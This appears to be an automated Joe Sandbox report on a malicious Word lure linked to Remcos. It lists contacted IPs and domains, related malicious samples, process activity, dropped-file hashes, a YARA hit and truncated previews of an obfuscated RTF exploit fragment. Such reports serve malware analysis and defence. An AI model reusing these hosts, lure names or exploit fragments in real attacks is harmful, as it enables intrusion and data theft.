                                                                                                                                              24.199.88.84
                                                                                                                                              u4u.kidsUnited States
                                                                                                                                              12271TWC-12271-NYCUStrue
                                                                                                                                              178.237.33.50
                                                                                                                                              geoplugin.netNetherlands
                                                                                                                                              8455ATOM86-ASATOM86NLfalse
                                                                                                                                              216.58.212.129
                                                                                                                                              drive.usercontent.google.comUnited States
                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                              85.215.206.82
                                                                                                                                              unknownGermany
                                                                                                                                              6724STRATOSTRATOAGDEtrue
                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                              Analysis ID:1540324
                                                                                                                                              Start date and time:2024-10-23 17:25:12 +02:00
                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 9m 32s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:full
                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                              Number of analysed new started processes analysed:26
                                                                                                                                              Number of new started drivers analysed:1
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Sample name:PO NAHK22012FA00000.docx.doc
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal100.rans.phis.troj.spyw.expl.evad.winDOC@28/44@11/6
                                                                                                                                              EGA Information:
                                                                                                                                              • Successful, ratio: 66.7%
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 99%
                                                                                                                                              • Number of executed functions: 202
                                                                                                                                              • Number of non-executed functions: 292
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Found application associated with file extension: .doc
                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                              • Attach to Office via COM
                                                                                                                                              • Scroll down
                                                                                                                                              • Close Viewer
                                                                                                                                              • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                                              • Execution Graph export aborted for target EQNEDT32.EXE, PID 3964 because there are no executed function
                                                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 4040 because there are no executed function
                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 1980 because it is empty
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                              • VT rate limit hit for: PO NAHK22012FA00000.docx.doc
                                                                                                                                              TimeTypeDescription
                                                                                                                                              11:26:28API Interceptor89x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                              11:26:36API Interceptor62x Sleep call for process: mshta.exe modified
                                                                                                                                              11:26:38API Interceptor541x Sleep call for process: powershell.exe modified
                                                                                                                                              11:26:49API Interceptor5x Sleep call for process: wscript.exe modified
                                                                                                                                              11:27:20API Interceptor683752x Sleep call for process: CasPol.exe modified
                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              45.90.89.981729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                  na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                        5fKvwnCAeC.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                          AMG Cargo Logistic.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                            factura proforma .docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                              AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                gcnmTxDXTo.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                  24.199.88.84Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                                                                                                    Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                      InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                        178.237.33.50ZW_PCCE-010023024001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                                                        SecuriteInfo.com.Win32.Evo-gen.798.4975.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                                                        Unicredit.Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                                                        1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                                                        nicworkgbeeterworkgoodthingswithgereatniceforme.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                                                        EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                                                        BA4M310209H14956.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                                                        LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                                                        DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                                                        DHL AWB_NO_92847309329.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        servemail.exprotedsteel.pro1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 45.90.89.98
                                                                                                                                                                        u4u.kidsLogs.xlsGet hashmaliciousLokibotBrowse
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        geoplugin.netZW_PCCE-010023024001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        SecuriteInfo.com.Win32.Evo-gen.798.4975.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        Unicredit.Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        nicworkgbeeterworkgoodthingswithgereatniceforme.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        BA4M310209H14956.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        DHL AWB_NO_92847309329.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        CMCSUS1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 45.90.89.98
                                                                                                                                                                        la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 50.226.169.224
                                                                                                                                                                        la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 50.226.169.222
                                                                                                                                                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                        • 50.226.169.219
                                                                                                                                                                        armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                        • 140.89.48.59
                                                                                                                                                                        gaber_mnr.ps1Get hashmaliciousMetasploit, XmrigBrowse
                                                                                                                                                                        • 50.220.121.211
                                                                                                                                                                        Kwwj1OiNtn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 45.89.247.20
                                                                                                                                                                        Kwwj1OiNtn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 45.89.247.20
                                                                                                                                                                        iKJsGpNTrF.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 45.66.231.93
                                                                                                                                                                        na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                        • 45.139.104.161
                                                                                                                                                                        TWC-12271-NYCUSLogs.xlsGet hashmaliciousLokibotBrowse
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        byte.mpsl.elfGet hashmaliciousOkiruBrowse
                                                                                                                                                                        • 68.174.131.114
                                                                                                                                                                        InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        l6G93s9XLN.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                        • 68.173.141.203
                                                                                                                                                                        la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 66.108.151.148
                                                                                                                                                                        la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 72.231.14.8
                                                                                                                                                                        yakuza.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 74.72.188.143
                                                                                                                                                                        la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 24.90.54.210
                                                                                                                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 24.161.155.135
                                                                                                                                                                        ATOM86-ASATOM86NLZW_PCCE-010023024001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        SecuriteInfo.com.Win32.Evo-gen.798.4975.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        Unicredit.Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        nicworkgbeeterworkgoodthingswithgereatniceforme.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        BA4M310209H14956.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 178.237.33.50
                                                                                                                                                                        ceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                        • 85.222.236.220
                                                                                                                                                                        STRATOSTRATOAGDELlbpXphTu9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 81.169.145.95
                                                                                                                                                                        byte.arm.elfGet hashmaliciousOkiruBrowse
                                                                                                                                                                        • 85.215.62.133
                                                                                                                                                                        6fLnWSoXXD.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                        • 81.169.217.50
                                                                                                                                                                        SecuriteInfo.com.Win64.TrojanX-gen.21901.11051.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 81.169.182.189
                                                                                                                                                                        arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                        • 81.169.217.71
                                                                                                                                                                        na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                        • 81.169.217.60
                                                                                                                                                                        HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 85.214.228.140
                                                                                                                                                                        na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 81.169.242.82
                                                                                                                                                                        PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                        • 85.214.228.140
                                                                                                                                                                        08102024_1541_Beschwerde-Rechtsanwalt.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                        • 81.169.145.148
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        05af1f5ca1b87cc9cc9b25185115607dLogs.xlsGet hashmaliciousLokibotBrowse
                                                                                                                                                                        • 142.250.181.238
                                                                                                                                                                        • 216.58.212.129
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                        • 142.250.181.238
                                                                                                                                                                        • 216.58.212.129
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                        • 142.250.181.238
                                                                                                                                                                        • 216.58.212.129
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        oodforme.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 142.250.181.238
                                                                                                                                                                        • 216.58.212.129
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 142.250.181.238
                                                                                                                                                                        • 216.58.212.129
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        SGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • 142.250.181.238
                                                                                                                                                                        • 216.58.212.129
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        BA4M310209H14956.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 142.250.181.238
                                                                                                                                                                        • 216.58.212.129
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        MT103-539 PAYMENT (1).docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                        • 142.250.181.238
                                                                                                                                                                        • 216.58.212.129
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        PaymentXConfirmationXcopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                        • 142.250.181.238
                                                                                                                                                                        • 216.58.212.129
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        76.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                        • 142.250.181.238
                                                                                                                                                                        • 216.58.212.129
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        7dcce5b76c8b17472d024758970a406bLogs.xlsGet hashmaliciousLokibotBrowse
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        Inv No.248730.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        Oct2024TU-580.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        Inv No.248730.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        Purchase Order IOI 7300194 Data Sheet.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        SGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        Purchase Order IOI 7300194 Data Sheet.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 24.199.88.84
                                                                                                                                                                        No context
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):131072
                                                                                                                                                                        Entropy (8bit):0.025593217010028504
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:I3DPc3FvxggLR1bgvIqg/RXv//4tfnRujlw//+GtluJ/eRuj:I3DPyJ9qGvYg3J/
                                                                                                                                                                        MD5:C4C34027D6BD02D908AC1B9AA9B58905
                                                                                                                                                                        SHA1:F53802BD01593E9055166DFCD19BD263FE1F6E57
                                                                                                                                                                        SHA-256:B10F7148DB75CFCC8D7F701FC0C8CD3AC9A574B1078591E25DC37C5772B955BA
                                                                                                                                                                        SHA-512:66B01FCB68C96C1B0F6E9FFF3E7309F6D2B3531B1869B585820297EAABE4E40D8DF7C3799137ADA7468DD5DFB76E96D95A53F3E4B7230B72D0F27800611128C1
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:......M.eFy...z:.W..o.N.t..FH..S,...X.F...Fa.q............................".9.!.<G...............>.y.mD.X.k.L.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):4760
                                                                                                                                                                        Entropy (8bit):4.834060479684549
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                                                                                                                        MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                                                                                                                        SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                                                                                                                        SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                                                                                                                        SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:@...e...........................................................
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:Rich Text Format data, version 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):87950
                                                                                                                                                                        Entropy (8bit):2.6460884092834385
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:OjO/O2+S+PXH9C+QwmXiTfgiK2l2xIPaa:gR2Dl+QtwDlca
                                                                                                                                                                        MD5:BFC7589C5992988E346361BA16E0F921
                                                                                                                                                                        SHA1:A546AAECD617E235E40362B626A2586636C39D65
                                                                                                                                                                        SHA-256:A4030FDB30504AAA2077873AAD15595B4D87BBFABAEB8AE1B245D6613941A591
                                                                                                                                                                        SHA-512:298C036894BB4FF1971DD2D9EA554872830B53D65DE0CC70770580E9276F6F1251F6A075407585268F6E292D15FDB3AB27E66CD3554E501D7A68D02E37842232
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthi[1].doc, Author: ditekSHen
                                                                                                                                                                        Preview:{\rtf1..{\*\u4CejNJYaQZlC85Z28jrieibfWIYwYrBS76sJxdQSFfic06eKWkOTLommHk4ogDr58LKQBGddTreO}..{\5265154797?./.86&63.1~=3??1##&+?.@5:~_.#,3.;[9$69,?9%'#?/%.1?3<?!7!?:9-3*622~5=''8?4]8?=)4;.8?>>?'6<;=$-|%(9@^5*,=(?%1&_``;/?.=.1|`3.]~?6#(*&?##?+_,||>@6.)7[@?3/[9.|?@(?#]^(!%3&)&%73%6`%.$^[?&?;?.*^<1[8][0[?$.|0?/4.8%3.~'./36??(8`*?.6?<@@2/-/=.%|5*|%;,]:19!$.%)(_=^()<>0,3=@!]@=?'!$-&(,-%3@,_0|>~].4;@,6!*5=|~2'%<?,^%)8-7%^0$.?&)?;0.^?-&?$+<1#//+-?,6*[(16<..`613)%>?@%?|2`6;<%&/2_#=>=@2.-8~.?+4;.-%#6%^9,^~_!?1803%'4#(.%2?!%%/*6'!]`((1;+?..``?._))0?,<53=@@9..9?-^,|&@~:^.@'|^&%|'%?`.`.-^.&?6/+)</6,]/?,.#!:8.!|?@0(;?/(4%,_2-2`9?`%-@!1%%5?>_.`!'&3;..:2-$&,.'0.@5:%=%_/2/?8?/][9:5=>.)3*~`6%3?-.|`/?#.-^~^?&?;)?<0]]/8,|?*.%;)<'!54?~<43.4[=~,&5`]%`#];)82-?!,]_@%?~9(2??-])6)./7+?5-`.!:~'(@-~.&:>*^1?/0@+.^5'?<93[.,'(7<7<&:&&%?5>'$.'>98'$'.3'/>:&80~`%..@'?+^^/40<#@+;2%&1?4?-&/5/*^??*?^?+](^??[#.2!?&)[+$??*0%>13?~_2`(:7~==*?,1]>5.5<3:<?./6`#<[**@>(`5<1~?#*6/#?_%.?:@%,?9?*~.0|[.%7$+32%>[~.,82))[%6/>95--$.+;<??
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):140662
                                                                                                                                                                        Entropy (8bit):3.687456635992758
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:kSb7gt5pWGwiAON6gpvRwd07c3v9TVyr2HUDH:zKRRwd0eVTY2CH
                                                                                                                                                                        MD5:E9D4662595A294AA122FB25CB9596E64
                                                                                                                                                                        SHA1:62F49FFD85F901F68EEB23A3DE78D3A19E28D0F6
                                                                                                                                                                        SHA-256:99D2EF08D3101CDFD89AFEA909815A7448200A7175A85D13C19B29DB084C7DD1
                                                                                                                                                                        SHA-512:CD164953B1DDD6416611DB863F61B0FE69C5AA4271B033E5E72118F31D2FBD2E0440CFB37137768185D85692B56F11B7433212B1B858C248692CA13C163C6D1F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .a.v.i.n.a.g.r.a.r.)..... . . . .d.i.m. .c.a.r.n.i.s.t.a.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .c.a.r.n.i.s.t.a..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .c.a.r.n.i.s.t.a.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .p.
                                                                                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):133688
                                                                                                                                                                        Entropy (8bit):2.5311599425492504
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:Eam7X/Ot9CLGFNOt9CaIGcHFX6k6m46FHHO7HxOt9CZ4Ot9CiimAb5WGwONOt9CH:Ea2Xmt4+Et4jlXPRt47t4SGEt4TT
                                                                                                                                                                        MD5:02B4AB021D0F800EC41B06E11B8DA4AC
                                                                                                                                                                        SHA1:767D0E4DDDF988CA60A9C1DFDA19B7CFC0D56B47
                                                                                                                                                                        SHA-256:137502965371FE3D3DADD7C0BF9EB27103DCFD391E7676F322022F2C46DB9084
                                                                                                                                                                        SHA-512:6F79B586DEE5CB23D152E31941CBA571C27F4C905C74F2E04BF534315D74132CDA92FBD2960367AFAF9936F7E7C68C3166C94BCEBD3F8C4B9783480F9A4B0A5A
                                                                                                                                                                        Malicious:true
